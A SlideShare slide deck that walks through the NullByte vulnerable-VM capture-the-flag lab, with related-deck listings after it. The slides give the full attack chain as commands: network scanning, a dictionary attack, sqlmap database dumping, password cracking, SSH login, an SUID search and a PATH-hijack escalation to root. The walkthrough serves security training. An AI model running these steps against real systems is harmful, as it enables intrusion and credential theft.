SlideShare a Scribd company logo

Exploiting null byte vm

D
devanshdubey7

This is a presentation on exploiting Null Byte VM. Null Byte VM is an vulnerable vm available on vulnhub.In this presentation I had exploited vm with various tools available on kali linux and then escalated privileges to become root.In this CTF challenge we have to find a flag i.e. proof.txt.

1 of 25
Download to read offline
EXPLOITING NULL BYTE VM (CTF CHALLENGE) BY DEVANSH DUBEY DATE:21 April 2019
ABOUT ME  Devansh Dubey  Volunteer at NULL Bhopal  Undergoing graduation from UIT RGPV  Cyber Security enthusiast  Twitter handle: @devanshdubey97
About Null Byte VM • Name: NullByte: 1 • Codename: NB0x01 • Date release: 1 Aug 2015 • Author: ly0n • Series: NullByte • Web page: http://ly0n.me/2015/08/01/nullbyte-challenge-0x01/? • Download: ly0n.me/nullbyte/NullByte.ova.zip • Objective: Get to /root/proof.txt and follow the instructions. • Level: Basic to intermediate. • Description: Boot2root, box will get IP from dhcp, works fine with virtualbox & vmware. • Operating System: Linux
Our Agenda: • Network Scanning (Nmap, netdiscover) • Exacting hidden text from an image obtained from IP(ExifTool) • Dictionary Attack using rockyou.txt(Burp suite) to obtain key. • Obtaining Database information via Sqlmap • Login to SSH on port 777 • Find SUID Binaries • Privilege Escalation by Manipulating $PATH • Get Root access and capture the flag(proof.txt)
LETS BEGIN 1. Netdiscover: Netdiscover is an ARP scanner to scan for live hosts in a range of network. In the first step we will find the target. We will use netdiscover, which is command line tool in kali linux to find the target • Netdiscover –r 172.16.219.0/24
NET DISCOVER RESULT Our target is 172.16.219.142. And now since we know our target, we will scan it using nmap
2. Nmap Scan • Our target is 172.16.219.142 ,we will scan it using nmap. • nmap -A 172.16.219.142 -A : For OS detection, version detection,script scanning,and traceroute. • Scanning the IP, we will know that the port number 80, 111, 777, 44607 are open and the service of SSH is forwarded from 22 to 777 port. Now we will try and open the targeted IP in the browser.
NMAP RESULTS
3. Exiftool: Here is an image and a quote on the page. We will find nothing on the page and page source. Hence data can be hidden . To see the hidden data we will use exiftool which is an open source tool available on github. Available on: https://github.com/exiftool/exiftool
There you will find a comment kzMb5nVYJw. Now this might be a directory so lets open it on browser. On opening it, we will see a text field which require a KEY.
APPLY DICTIONARY ATTACK TO GET KEY
4. Dictionary Attack   • It is asking for a key, since it is a text field we will use the dictionary attack to find the key using BurpSuite and rockyou.txt. (rockyou.txt is an wordlist file available in /usr/share/wordlist directory).Through the dictionary attack, we will find the key i.e. elite.
Exploiting null byte vm
5. Using Sqlmap : • Through the dictionary attack we will find the key i.e. elite. After entering the key in the text field, the new web page will get opened which will be asking for username, but till now we didn’t knew the username. So, we will find it in its Database using sqlmap.  • sqlmap -u http://172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1 -- dbs –batch --batch: never ask for user input, use default behaviour. --dbs: databases
It will give you the name of the database i.e. information_schema,mysql,performance_schema,seth.  
6. Now further we will find columns and tables and for that type: • sqlmap -u //172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -- dump-all –batch • dump-all : dump all dbms databases entry. • Once command executes, it will show you the table name along with column and password as shown:
Now we know username is ramses and password is in encrypted form .
7. Password decoding: • Now we have username and password but the password is encrypted, so we need to crack it and there are many online tools to do so. • First decrypt with base64 • $ echo “YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=” | base64 –d • Then to crack it go to md5decoder.org and give the md5 value there and click on ok and it will show you the original word i.e. omega
8. Login through SSH Now we will SSH to log in and for that type: • ssh ramses@172.16.219.142 -p 777 • After that give omega as the password. Once we login then by using the following command, we can enumerate all binaries having SUID permission. • find / -perm -u=s -type f 2>/dev/null • Here we found out that SUID bit enabled for /var/www/backup/procwatch
SUID ENABLED
9. Privilege Escalation • cd /var/www/bakcup/ • ./procwatch Procwatch is security monitor written in Perl that watches a /proc filesystem for new processes. When a process is created, procwatch reports the time, the username, the PID, and the binary that was run. Its output is suitable for logging to log files and is geared for system administrators who are testing a new but as yet untrusted UNIX system. Procwatch is root owned that mean the file is running with root priviliges.
10. Privilege Escalation • echo "/bin/sh"  > ps • chmod 777 ps • echo $PATH • export PATH=.:$PATH • echo $PATH • ./procwatch • Due to ‘.’ in $PATH means that the user is able to execute binaries/scripts from the current directory. Hence now on executing id command we will find ourselves as root. • id • cd /root • ls • cat proof.txt
FLAG FOUND!!
REFERENCES • Website: http://ly0n.me/2015/08/01/nullbyte-challenge-0x01/ • Download: http://ly0n.me/nullbyte/NullByte.ova.zip • Download (Mirror): https://download.vulnhub.com/nullbyte/NullByte.ova.zip • Download (Torrent): https://download.vulnhub.com/nullbyte/NullByte.ova.zip.torrent    ( Magnet)? • https://github.com/Hamza-Megahed/CTFs/blob/master/NullByte/README • https://www.hackingarticles.in/hack-nullbyte-vm-ctf-challenge/ • https://resources.infosecinstitute.com/nullbyte-walkthrough/#gref • https://www.thegeekdiary.com/what-is-suid-sgid-and-sticky-bit/ • http://eng.omegaton.com/2017/04/null-byte-report.html
Any Questions……??
Ad

Recommended

Mastering ElasticSearch with Ruby and Tire
Mastering ElasticSearch with Ruby and TireMastering ElasticSearch with Ruby and Tire
Mastering ElasticSearch with Ruby and Tire
Luca Bonmassar
 
My Sq Ldb Tut
My Sq Ldb TutMy Sq Ldb Tut
My Sq Ldb Tut
AkramWaseem
 
Node.js - The New, New Hotness
Node.js - The New, New HotnessNode.js - The New, New Hotness
Node.js - The New, New Hotness
Daniel Shaw
 
Installing OpenSim (Diva Distro) to Create Your Own Private Sim Sandbox
Installing OpenSim (Diva Distro) to Create Your Own Private Sim SandboxInstalling OpenSim (Diva Distro) to Create Your Own Private Sim Sandbox
Installing OpenSim (Diva Distro) to Create Your Own Private Sim Sandbox
Fleep Tuque
 
How *NOT* to firmware
How *NOT* to firmwareHow *NOT* to firmware
How *NOT* to firmware
Amit Serper
 
Rust 101 (2017 edition)
Rust 101 (2017 edition)Rust 101 (2017 edition)
Rust 101 (2017 edition)
Robert 'Bob' Reyes
 
Embedded Rust on IoT devices
Embedded Rust on IoT devicesEmbedded Rust on IoT devices
Embedded Rust on IoT devices
Lars Gregori
 
Secure code 3rd_party_libs
Secure code 3rd_party_libsSecure code 3rd_party_libs
Secure code 3rd_party_libs
FKM Naimul Huda, PMP
 
Embedded Rust – Rust on IoT devices
Embedded Rust – Rust on IoT devicesEmbedded Rust – Rust on IoT devices
Embedded Rust – Rust on IoT devices
Lars Gregori
 
Why Bundler 1.1 will be much faster
Why Bundler 1.1 will be much fasterWhy Bundler 1.1 will be much faster
Why Bundler 1.1 will be much faster
Pat Shaughnessy
 
PHP Benelux 2017 - Caching The Right Way
PHP Benelux 2017 - Caching The Right WayPHP Benelux 2017 - Caching The Right Way
PHP Benelux 2017 - Caching The Right Way
André Rømcke
 
Blowser
BlowserBlowser
Blowser
Nicolas Troncoso
 
Virtual boxen
Virtual boxenVirtual boxen
Virtual boxen
Ngo Huu Thinh
 
The Unix Command Line | Jim Reevior
The Unix Command Line | Jim ReeviorThe Unix Command Line | Jim Reevior
The Unix Command Line | Jim Reevior
Oomph, Inc.
 
Installing BOA on Ubuntu 12.04 LTS
Installing BOA on Ubuntu 12.04 LTSInstalling BOA on Ubuntu 12.04 LTS
Installing BOA on Ubuntu 12.04 LTS
Hector Iribarne
 
Node js quick tour v2
Node js quick tour v2Node js quick tour v2
Node js quick tour v2
Wyatt Fang
 
Building APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuthBuilding APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuth
Filip Ekberg
 
Hack the box open admin writeup
Hack the box open admin writeupHack the box open admin writeup
Hack the box open admin writeup
tamlaiyin
 
Squidinstallation
SquidinstallationSquidinstallation
Squidinstallation
Chirag Gupta
 
Red Hat Linux cheat sheet
Red Hat Linux cheat sheetRed Hat Linux cheat sheet
Red Hat Linux cheat sheet
Rafael Montesinos Muñoz
 
Vagrant - Team Development made easy
Vagrant - Team Development made easyVagrant - Team Development made easy
Vagrant - Team Development made easy
Marco Silva
 
Hadoop presentation
Hadoop presentationHadoop presentation
Hadoop presentation
MaggieZhang61
 
Introduction to Node.js: perspectives from a Drupal dev
Introduction to Node.js: perspectives from a Drupal devIntroduction to Node.js: perspectives from a Drupal dev
Introduction to Node.js: perspectives from a Drupal dev
mcantelon
 
A language for the Internet: Why JavaScript and Node.js is right for Internet...
A language for the Internet: Why JavaScript and Node.js is right for Internet...A language for the Internet: Why JavaScript and Node.js is right for Internet...
A language for the Internet: Why JavaScript and Node.js is right for Internet...
Tom Croucher
 
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
I Goo Lee
 
GeekCampSG - Nodejs , Websockets and Realtime Web
GeekCampSG - Nodejs , Websockets and Realtime WebGeekCampSG - Nodejs , Websockets and Realtime Web
GeekCampSG - Nodejs , Websockets and Realtime Web
Bhagaban Behera
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
Mike Felch
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchain
jasonhaddix
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
Kenneth Kwon
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
infodox
 
Ad

More Related Content

What's hot (18)

Embedded Rust – Rust on IoT devices
Embedded Rust – Rust on IoT devicesEmbedded Rust – Rust on IoT devices
Embedded Rust – Rust on IoT devices
Lars Gregori
 
Why Bundler 1.1 will be much faster
Why Bundler 1.1 will be much fasterWhy Bundler 1.1 will be much faster
Why Bundler 1.1 will be much faster
Pat Shaughnessy
 
PHP Benelux 2017 - Caching The Right Way
PHP Benelux 2017 - Caching The Right WayPHP Benelux 2017 - Caching The Right Way
PHP Benelux 2017 - Caching The Right Way
André Rømcke
 
Blowser
BlowserBlowser
Blowser
Nicolas Troncoso
 
Virtual boxen
Virtual boxenVirtual boxen
Virtual boxen
Ngo Huu Thinh
 
The Unix Command Line | Jim Reevior
The Unix Command Line | Jim ReeviorThe Unix Command Line | Jim Reevior
The Unix Command Line | Jim Reevior
Oomph, Inc.
 
Installing BOA on Ubuntu 12.04 LTS
Installing BOA on Ubuntu 12.04 LTSInstalling BOA on Ubuntu 12.04 LTS
Installing BOA on Ubuntu 12.04 LTS
Hector Iribarne
 
Node js quick tour v2
Node js quick tour v2Node js quick tour v2
Node js quick tour v2
Wyatt Fang
 
Building APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuthBuilding APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuth
Filip Ekberg
 
Hack the box open admin writeup
Hack the box open admin writeupHack the box open admin writeup
Hack the box open admin writeup
tamlaiyin
 
Squidinstallation
SquidinstallationSquidinstallation
Squidinstallation
Chirag Gupta
 
Red Hat Linux cheat sheet
Red Hat Linux cheat sheetRed Hat Linux cheat sheet
Red Hat Linux cheat sheet
Rafael Montesinos Muñoz
 
Vagrant - Team Development made easy
Vagrant - Team Development made easyVagrant - Team Development made easy
Vagrant - Team Development made easy
Marco Silva
 
Hadoop presentation
Hadoop presentationHadoop presentation
Hadoop presentation
MaggieZhang61
 
Introduction to Node.js: perspectives from a Drupal dev
Introduction to Node.js: perspectives from a Drupal devIntroduction to Node.js: perspectives from a Drupal dev
Introduction to Node.js: perspectives from a Drupal dev
mcantelon
 
A language for the Internet: Why JavaScript and Node.js is right for Internet...
A language for the Internet: Why JavaScript and Node.js is right for Internet...A language for the Internet: Why JavaScript and Node.js is right for Internet...
A language for the Internet: Why JavaScript and Node.js is right for Internet...
Tom Croucher
 
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
I Goo Lee
 
GeekCampSG - Nodejs , Websockets and Realtime Web
GeekCampSG - Nodejs , Websockets and Realtime WebGeekCampSG - Nodejs , Websockets and Realtime Web
GeekCampSG - Nodejs , Websockets and Realtime Web
Bhagaban Behera
 
Embedded Rust – Rust on IoT devices
Embedded Rust – Rust on IoT devicesEmbedded Rust – Rust on IoT devices
Embedded Rust – Rust on IoT devices
Lars Gregori
 
Why Bundler 1.1 will be much faster
Why Bundler 1.1 will be much fasterWhy Bundler 1.1 will be much faster
Why Bundler 1.1 will be much faster
Pat Shaughnessy
 
PHP Benelux 2017 - Caching The Right Way
PHP Benelux 2017 - Caching The Right WayPHP Benelux 2017 - Caching The Right Way
PHP Benelux 2017 - Caching The Right Way
André Rømcke
 
Blowser
BlowserBlowser
Blowser
Nicolas Troncoso
 
Virtual boxen
Virtual boxenVirtual boxen
Virtual boxen
Ngo Huu Thinh
 
The Unix Command Line | Jim Reevior
The Unix Command Line | Jim ReeviorThe Unix Command Line | Jim Reevior
The Unix Command Line | Jim Reevior
Oomph, Inc.
 
Installing BOA on Ubuntu 12.04 LTS
Installing BOA on Ubuntu 12.04 LTSInstalling BOA on Ubuntu 12.04 LTS
Installing BOA on Ubuntu 12.04 LTS
Hector Iribarne
 
Node js quick tour v2
Node js quick tour v2Node js quick tour v2
Node js quick tour v2
Wyatt Fang
 
Building APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuthBuilding APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuth
Filip Ekberg
 
Hack the box open admin writeup
Hack the box open admin writeupHack the box open admin writeup
Hack the box open admin writeup
tamlaiyin
 
Squidinstallation
SquidinstallationSquidinstallation
Squidinstallation
Chirag Gupta
 
Red Hat Linux cheat sheet
Red Hat Linux cheat sheetRed Hat Linux cheat sheet
Red Hat Linux cheat sheet
Rafael Montesinos Muñoz
 
Vagrant - Team Development made easy
Vagrant - Team Development made easyVagrant - Team Development made easy
Vagrant - Team Development made easy
Marco Silva
 
Hadoop presentation
Hadoop presentationHadoop presentation
Hadoop presentation
MaggieZhang61
 
Introduction to Node.js: perspectives from a Drupal dev
Introduction to Node.js: perspectives from a Drupal devIntroduction to Node.js: perspectives from a Drupal dev
Introduction to Node.js: perspectives from a Drupal dev
mcantelon
 
A language for the Internet: Why JavaScript and Node.js is right for Internet...
A language for the Internet: Why JavaScript and Node.js is right for Internet...A language for the Internet: Why JavaScript and Node.js is right for Internet...
A language for the Internet: Why JavaScript and Node.js is right for Internet...
Tom Croucher
 
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
Intro KaKao MRTE (MySQL Realtime Traffic Emulator)
I Goo Lee
 
GeekCampSG - Nodejs , Websockets and Realtime Web
GeekCampSG - Nodejs , Websockets and Realtime WebGeekCampSG - Nodejs , Websockets and Realtime Web
GeekCampSG - Nodejs , Websockets and Realtime Web
Bhagaban Behera
 

Similar to Exploiting null byte vm (20)

Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
Mike Felch
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchain
jasonhaddix
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
Kenneth Kwon
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
infodox
 
Eusecwest
EusecwestEusecwest
Eusecwest
zynamics GmbH
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
OSS Security the hard way
OSS Security the hard wayOSS Security the hard way
OSS Security the hard way
Hiroshi SHIBATA
 
How secure is your code?
How secure is your code?How secure is your code?
How secure is your code?
Mikee Franklin
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
Deepanshu Gajbhiye
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
Zoltan Balazs
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1
Venkat Raman
 
Scrapy
ScrapyScrapy
Scrapy
Francisco Sousa
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
Gianluca Varisco
 
Weaponizing Recon - Smashing Applications for Security Vulnerabilities & Profits
Weaponizing Recon - Smashing Applications for Security Vulnerabilities & ProfitsWeaponizing Recon - Smashing Applications for Security Vulnerabilities & Profits
Weaponizing Recon - Smashing Applications for Security Vulnerabilities & Profits
Harsh Bothra
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with Golang
Chris McEniry
 
Introduction to the intermediate Python - v1.1
Introduction to the intermediate Python - v1.1Introduction to the intermediate Python - v1.1
Introduction to the intermediate Python - v1.1
Andrei KUCHARAVY
 
Java Symmetric
Java SymmetricJava Symmetric
Java Symmetric
phanleson
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015
Jason Packer
 
Help Doctor, my application is an onion!
Help Doctor, my application is an onion!Help Doctor, my application is an onion!
Help Doctor, my application is an onion!
Sebastián Guerrero Selma
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying Techniques
Leo Loobeek
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
Mike Felch
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchain
jasonhaddix
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
Kenneth Kwon
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
infodox
 
Eusecwest
EusecwestEusecwest
Eusecwest
zynamics GmbH
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
OSS Security the hard way
OSS Security the hard wayOSS Security the hard way
OSS Security the hard way
Hiroshi SHIBATA
 
How secure is your code?
How secure is your code?How secure is your code?
How secure is your code?
Mikee Franklin
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
Deepanshu Gajbhiye
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
Zoltan Balazs
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1
Venkat Raman
 
Scrapy
ScrapyScrapy
Scrapy
Francisco Sousa
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
Gianluca Varisco
 
Weaponizing Recon - Smashing Applications for Security Vulnerabilities & Profits
Weaponizing Recon - Smashing Applications for Security Vulnerabilities & ProfitsWeaponizing Recon - Smashing Applications for Security Vulnerabilities & Profits
Weaponizing Recon - Smashing Applications for Security Vulnerabilities & Profits
Harsh Bothra
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with Golang
Chris McEniry
 
Introduction to the intermediate Python - v1.1
Introduction to the intermediate Python - v1.1Introduction to the intermediate Python - v1.1
Introduction to the intermediate Python - v1.1
Andrei KUCHARAVY
 
Java Symmetric
Java SymmetricJava Symmetric
Java Symmetric
phanleson
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015
Jason Packer
 
Help Doctor, my application is an onion!
Help Doctor, my application is an onion!Help Doctor, my application is an onion!
Help Doctor, my application is an onion!
Sebastián Guerrero Selma
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying Techniques
Leo Loobeek
 
Ad

Recently uploaded (20)

TrsLabs - Leverage the Power of UPI Payments
TrsLabs - Leverage the Power of UPI PaymentsTrsLabs - Leverage the Power of UPI Payments
TrsLabs - Leverage the Power of UPI Payments
Trs Labs
 
Unlocking Generative AI in your Web Apps
Unlocking Generative AI in your Web AppsUnlocking Generative AI in your Web Apps
Unlocking Generative AI in your Web Apps
Maximiliano Firtman
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
Build 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHSBuild 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHS
TECH EHS Solution
 
Web and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in RajpuraWeb and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in Rajpura
Erginous Technology
 
TrsLabs - AI Agents for All - Chatbots to Multi-Agents Systems
TrsLabs - AI Agents for All - Chatbots to Multi-Agents SystemsTrsLabs - AI Agents for All - Chatbots to Multi-Agents Systems
TrsLabs - AI Agents for All - Chatbots to Multi-Agents Systems
Trs Labs
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Enterprise Integration Is Dead! Long Live AI-Driven Integration with Apache C...
Enterprise Integration Is Dead! Long Live AI-Driven Integration with Apache C...Enterprise Integration Is Dead! Long Live AI-Driven Integration with Apache C...
Enterprise Integration Is Dead! Long Live AI-Driven Integration with Apache C...
Markus Eisele
 
AI Agents at Work: UiPath, Maestro & the Future of Documents
AI Agents at Work: UiPath, Maestro & the Future of DocumentsAI Agents at Work: UiPath, Maestro & the Future of Documents
AI Agents at Work: UiPath, Maestro & the Future of Documents
UiPathCommunity
 
Viam product demo_ Deploying and scaling AI with hardware.pdf
Viam product demo_ Deploying and scaling AI with hardware.pdfViam product demo_ Deploying and scaling AI with hardware.pdf
Viam product demo_ Deploying and scaling AI with hardware.pdf
camilalamoratta
 
GyrusAI - Broadcasting & Streaming Applications Driven by AI and ML
GyrusAI - Broadcasting & Streaming Applications Driven by AI and MLGyrusAI - Broadcasting & Streaming Applications Driven by AI and ML
GyrusAI - Broadcasting & Streaming Applications Driven by AI and ML
Gyrus AI
 
Bepents tech services - a premier cybersecurity consulting firm
Bepents tech services - a premier cybersecurity consulting firmBepents tech services - a premier cybersecurity consulting firm
Bepents tech services - a premier cybersecurity consulting firm
Benard76
 
TrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business ConsultingTrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business Consulting
Trs Labs
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Q1 2025 Dropbox Earnings and Investor Presentation
Q1 2025 Dropbox Earnings and Investor PresentationQ1 2025 Dropbox Earnings and Investor Presentation
Q1 2025 Dropbox Earnings and Investor Presentation
Dropbox
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.
hpbmnnxrvb
 
Vaibhav Gupta BAML: AI work flows without Hallucinations
Vaibhav Gupta BAML: AI work flows without HallucinationsVaibhav Gupta BAML: AI work flows without Hallucinations
Vaibhav Gupta BAML: AI work flows without Hallucinations
john409870
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
TrsLabs - Leverage the Power of UPI Payments
TrsLabs - Leverage the Power of UPI PaymentsTrsLabs - Leverage the Power of UPI Payments
TrsLabs - Leverage the Power of UPI Payments
Trs Labs
 
Unlocking Generative AI in your Web Apps
Unlocking Generative AI in your Web AppsUnlocking Generative AI in your Web Apps
Unlocking Generative AI in your Web Apps
Maximiliano Firtman
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
Build 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHSBuild 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHS
TECH EHS Solution
 
Web and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in RajpuraWeb and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in Rajpura
Erginous Technology
 
TrsLabs - AI Agents for All - Chatbots to Multi-Agents Systems
TrsLabs - AI Agents for All - Chatbots to Multi-Agents SystemsTrsLabs - AI Agents for All - Chatbots to Multi-Agents Systems
TrsLabs - AI Agents for All - Chatbots to Multi-Agents Systems
Trs Labs
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Enterprise Integration Is Dead! Long Live AI-Driven Integration with Apache C...
Enterprise Integration Is Dead! Long Live AI-Driven Integration with Apache C...Enterprise Integration Is Dead! Long Live AI-Driven Integration with Apache C...
Enterprise Integration Is Dead! Long Live AI-Driven Integration with Apache C...
Markus Eisele
 
AI Agents at Work: UiPath, Maestro & the Future of Documents
AI Agents at Work: UiPath, Maestro & the Future of DocumentsAI Agents at Work: UiPath, Maestro & the Future of Documents
AI Agents at Work: UiPath, Maestro & the Future of Documents
UiPathCommunity
 
Viam product demo_ Deploying and scaling AI with hardware.pdf
Viam product demo_ Deploying and scaling AI with hardware.pdfViam product demo_ Deploying and scaling AI with hardware.pdf
Viam product demo_ Deploying and scaling AI with hardware.pdf
camilalamoratta
 
GyrusAI - Broadcasting & Streaming Applications Driven by AI and ML
GyrusAI - Broadcasting & Streaming Applications Driven by AI and MLGyrusAI - Broadcasting & Streaming Applications Driven by AI and ML
GyrusAI - Broadcasting & Streaming Applications Driven by AI and ML
Gyrus AI
 
Bepents tech services - a premier cybersecurity consulting firm
Bepents tech services - a premier cybersecurity consulting firmBepents tech services - a premier cybersecurity consulting firm
Bepents tech services - a premier cybersecurity consulting firm
Benard76
 
TrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business ConsultingTrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business Consulting
Trs Labs
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
